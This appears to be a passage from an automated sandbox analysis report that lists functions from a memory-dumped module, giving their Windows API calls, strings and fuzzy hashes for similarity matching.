Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Variant$ArrayClearSafe$Bound$DestroyElementInit
String ID:
API String ID: 758290628-0
Opcode ID: ae55d4caf5dd9468f40f965ac5ae98ac5a4bff34d9dc50febd0f67aee1bfea76
Instruction ID: 7ef16f86da6cb65f83f9b0e019aca2cf6a0c7b0b9e1c47463a5861822314db37
Opcode Fuzzy Hash: ae55d4caf5dd9468f40f965ac5ae98ac5a4bff34d9dc50febd0f67aee1bfea76
Instruction Fuzzy Hash: 667189762093819FC700DFA8D8C495BBBF4BB99308F248A6EF59587750C730E949CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CE2FC30 Relevance: 13.7, APIs: 9, Instructions: 154fileCOMMON

Download Yara Rule

APIs

UnmapViewOfFile.KERNEL32(00000000,?,?,00000000,CB65479A), ref: 6CE2FC98
CloseHandle.KERNEL32(FFFFFFFF,?,?,00000000,CB65479A), ref: 6CE2FCAD
CloseHandle.KERNEL32(?,?,?,00000000,CB65479A), ref: 6CE2FCB7
SetLastError.KERNEL32(00000000,?,?,00000000,CB65479A), ref: 6CE2FCBA
CreateFileW.KERNEL32(?,-00000001,00000001,00000000,00000003,00000000,00000000,?,?,00000000,CB65479A), ref: 6CE2FD01
GetFileSizeEx.KERNEL32(00000000,?,?,?,00000000,CB65479A), ref: 6CE2FD14
GetLastError.KERNEL32(?,?,00000000,CB65479A), ref: 6CE2FD2A
CreateFileMappingW.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,?,00000000,CB65479A), ref: 6CE2FD6B
MapViewOfFile.KERNEL32(00000000,?,00000000,00000000,00000000,?,?,00000000,CB65479A), ref: 6CE2FD98

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: File$CloseCreateErrorHandleLastView$MappingSizeUnmap
String ID:
API String ID: 1303881157-0
Opcode ID: 4002721cc8cb80625778685924ecbb489ee86634317fb2884e0067aab6968226
Instruction ID: 5380a074c285f3ff77c92feb106825b4765648c85837bb695951fa52b4ccf9e1
Opcode Fuzzy Hash: 4002721cc8cb80625778685924ecbb489ee86634317fb2884e0067aab6968226
Instruction Fuzzy Hash: CB5113B1600311AFDB008F39D885B5A77B4AB49368F3986A9EC15CF785DB38D8018BA5

Uniqueness

Uniqueness Score: -1.00%

Function 6CE54B60 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 143COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CE54BC8
std::_Xinvalid_argument.LIBCPMT ref: 6CE54BE0
std::_Xinvalid_argument.LIBCPMT ref: 6CE54BFA
_memmove.LIBCMT ref: 6CE54C64
_memmove.LIBCMT ref: 6CE54C81

Strings

invalid string position, xrefs: 6CE54BC3
string too long, xrefs: 6CE54BDB, 6CE54BF5

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 2168136238-4289949731
Opcode ID: 0593b0c39d2e1315b96dc9a4287a5c275116e3eab7d04f66f6cae98a7e6b4bb2
Instruction ID: 9870985a79456a6342abb7863aa3c06ce59bd3a42e0b8dfb997feb3d7fa30add
Opcode Fuzzy Hash: 0593b0c39d2e1315b96dc9a4287a5c275116e3eab7d04f66f6cae98a7e6b4bb2
Instruction Fuzzy Hash: C34183327052108BE324CE5CD880A5EF3FADBD6714BB10A1FF05587F90C7629CA58762

Uniqueness

Uniqueness Score: -1.00%

Function 6CE3FFEA Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 130COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CE423B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4240F

Strings

RSDi, xrefs: 6CE40075

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArrayDestroySafe
String ID: RSDi
API String ID: 4225690600-559181253
Opcode ID: c12ce6f4ae1421c4fd43965d6e48798fb407b382fd0ed1eede1c8d103bb82c8d
Instruction ID: b9b726764f0d5a72ae3225abff2c71a8526d562a14f143012a4f38d1e8dfed1f
Opcode Fuzzy Hash: c12ce6f4ae1421c4fd43965d6e48798fb407b382fd0ed1eede1c8d103bb82c8d
Instruction Fuzzy Hash: 8A413974A016089FCB00DFA9D984A5EB7BAAF99308F30859AE509EB755DB31EC41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE40815 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CE423B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4240F

Strings

RSUa, xrefs: 6CE40864

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArrayDestroySafe
String ID: RSUa
API String ID: 4225690600-2086061799
Opcode ID: cd162904e8a4ec094940e31793c4d516ceaeaf5ec341413ed3417294c0f0b2c4
Instruction ID: dc540678edf1dffc6c71aea1b9060b07d88929e8cf13bf8c3bfb5525cea25e0c
Opcode Fuzzy Hash: cd162904e8a4ec094940e31793c4d516ceaeaf5ec341413ed3417294c0f0b2c4
Instruction Fuzzy Hash: DF313B70E016089FDB00CB69D984B5DB7BAAF99308F30859AE418E7751CB75E981CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE406F9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CE423B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4240F

Strings

RSqb, xrefs: 6CE40748

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArrayDestroySafe
String ID: RSqb
API String ID: 4225690600-347567867
Opcode ID: f98c91bb9ada03c40300bc665fd234f3d44024bb57547e87ec4f312de020554a
Instruction ID: 70131e1f9f56fe5bcd7f801b8149b5e99a8b810d0176e89165e1e2313126a626
Opcode Fuzzy Hash: f98c91bb9ada03c40300bc665fd234f3d44024bb57547e87ec4f312de020554a
Instruction Fuzzy Hash: 86313970A016089FCB00DFA9DD84B9DB7BAAF99208F30859AE518E7741DB75E9818F50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE40787 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CE423B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4240F

Strings

RSa, xrefs: 6CE407D6

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArrayDestroySafe
String ID: RSa
API String ID: 4225690600-3169278968
Opcode ID: 6fee0695d61f9744dc9f243c80a0ab02a20def2320a5c980c3924048140a28d5
Instruction ID: d4d978b63cc567f5a5c3666a86f5fe4de84a6924c7cae2e0b405a4524a34bbf8
Opcode Fuzzy Hash: 6fee0695d61f9744dc9f243c80a0ab02a20def2320a5c980c3924048140a28d5
Instruction Fuzzy Hash: A4312A70A016189FCB00DFA9DD84B9DB7BAAF99308F30859AE518E7751C771E941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE4012D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CE423B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4240F

Strings

RS:h, xrefs: 6CE4017F

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArrayDestroySafe
String ID: RS:h
API String ID: 4225690600-3891202347
Opcode ID: 7d3767c8840de71fc25ffbaaac4a59edc48399894d352f4468951e0cc29f4d27
Instruction ID: 2fb8df38fe5d5321f20ad4383c79fe27354a0067a16bf64f38ad9080ad2ff1c5
Opcode Fuzzy Hash: 7d3767c8840de71fc25ffbaaac4a59edc48399894d352f4468951e0cc29f4d27
Instruction Fuzzy Hash: 12311971A016089FDB00DFA9DC84B9EB7BAAF99204F30859AE419E7752C771E9818B50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE40237 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CE423B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4240F

Strings

RS3g, xrefs: 6CE40286

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArrayDestroySafe
String ID: RS3g
API String ID: 4225690600-2794631155
Opcode ID: 79c0df8c39bf3bc6ca9f83e97905754954b505a42a6fdfd696114be9c780cb7a
Instruction ID: 965b3b7faea71b02c56b586165a4b05ac8e7571929af04d2208a1ea265da2abd
Opcode Fuzzy Hash: 79c0df8c39bf3bc6ca9f83e97905754954b505a42a6fdfd696114be9c780cb7a
Instruction Fuzzy Hash: 34313D70A016189FCB00CFA9DD84B9DB7BAAF99208F30869AE418E7751DB71ED41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE36D40 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 101COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

_rand.LIBCMT ref: 6CE36DEA

Part of subcall function 6CE89E0C: __getptd.LIBCMT ref: 6CE89E0C

std::exception::exception.LIBCMT ref: 6CE36E17
__CxxThrowException@8.LIBCMT ref: 6CE36E2C
std::exception::exception.LIBCMT ref: 6CE36E3B
__CxxThrowException@8.LIBCMT ref: 6CE36E50

Part of subcall function 6CE89BB5: std::exception::exception.LIBCMT ref: 6CE89C04
Part of subcall function 6CE89BB5: std::exception::exception.LIBCMT ref: 6CE89C1E
Part of subcall function 6CE89BB5: __CxxThrowException@8.LIBCMT ref: 6CE89C2F

Strings

0Bl, xrefs: 6CE36E49
0Bl, xrefs: 6CE36E25

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$__getptd_malloc_rand
String ID: 0Bl$0Bl
API String ID: 2791304714-1774228455
Opcode ID: ced05766ecc6eddab1bf7b00054788f6eb3df08d72ff8e5efe1c6c7422773c2f
Instruction ID: 302725506fe56836fc45abf4f6b734bb46b37385320550a869098fe6fae4ebf6
Opcode Fuzzy Hash: ced05766ecc6eddab1bf7b00054788f6eb3df08d72ff8e5efe1c6c7422773c2f
Instruction Fuzzy Hash: FE3124B19007449FC750CFA8C880A9AFBF4FB08314F64896ED85A9BB41D775E608CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6CE7C760 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 95COMMON

Download Yara Rule

APIs

type_info::operator!=.LIBCMT ref: 6CE7C7EB

Strings

ModPrime1PrivateExponent, xrefs: 6CE7C840
MultiplicativeInverseOfPrime2ModPrime1, xrefs: 6CE7C815
Prime2, xrefs: 6CE7C876
PrivateExponent, xrefs: 6CE7C85F
Prime1, xrefs: 6CE7C88A
ModPrime2PrivateExponent, xrefs: 6CE7C82C

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: type_info::operator!=
String ID: ModPrime1PrivateExponent$ModPrime2PrivateExponent$MultiplicativeInverseOfPrime2ModPrime1$Prime1$Prime2$PrivateExponent
API String ID: 2241493438-339133643
Opcode ID: 1ff21c76bfad1e7b1f5f8e238d188cc996ca42cc6f6a0562d23c2f61b73ab31a
Instruction ID: 6e874f94102bf03a4f7b21a7cb900bd015525772c84fedd7ca2e27a7b37ec210
Opcode Fuzzy Hash: 1ff21c76bfad1e7b1f5f8e238d188cc996ca42cc6f6a0562d23c2f61b73ab31a
Instruction Fuzzy Hash: AB319071A143408EC714DF7CC94699ABBF1AFD5208F204A2FF445AB720EB74D849CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6CE40457 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CE423B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4240F

Strings

RS%e, xrefs: 6CE40494

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArrayDestroySafe
String ID: RS%e
API String ID: 4225690600-1409579784
Opcode ID: 651f765e1b846a63567b4b815bb83dcfd5a8a74ca35d3947641dbb3e8d66b2b7
Instruction ID: dc23516603498670aadb8bbc25f88f354b047016c234da26ccfe8b1c285a6cc7
Opcode Fuzzy Hash: 651f765e1b846a63567b4b815bb83dcfd5a8a74ca35d3947641dbb3e8d66b2b7
Instruction Fuzzy Hash: B33149B0A016189FCB10CBA9DC84B9DB7BAAF95308F34859AE518E7742C775ED81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE3AA00 Relevance: 12.3, APIs: 8, Instructions: 309COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CE3AA54
VariantInit.OLEAUT32(?), ref: 6CE3AA5B
VariantInit.OLEAUT32(?), ref: 6CE3AA62
VariantInit.OLEAUT32(?), ref: 6CE3AA69
VariantClear.OLEAUT32(?), ref: 6CE3ACF2
VariantClear.OLEAUT32(?), ref: 6CE3ACF9
VariantClear.OLEAUT32(?), ref: 6CE3AD00
VariantClear.OLEAUT32(?), ref: 6CE3AD07

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Variant$ClearInit
String ID:
API String ID: 2610073882-0
Opcode ID: f26f92a5535806629c817d6aab0c096795f9fff3c2ede942751d68cd0e55e7b4
Instruction ID: 1b3c0a75f58ecfd682b3f543aa36bafe7c8225977c4e1fa238d705b94cc55b3b
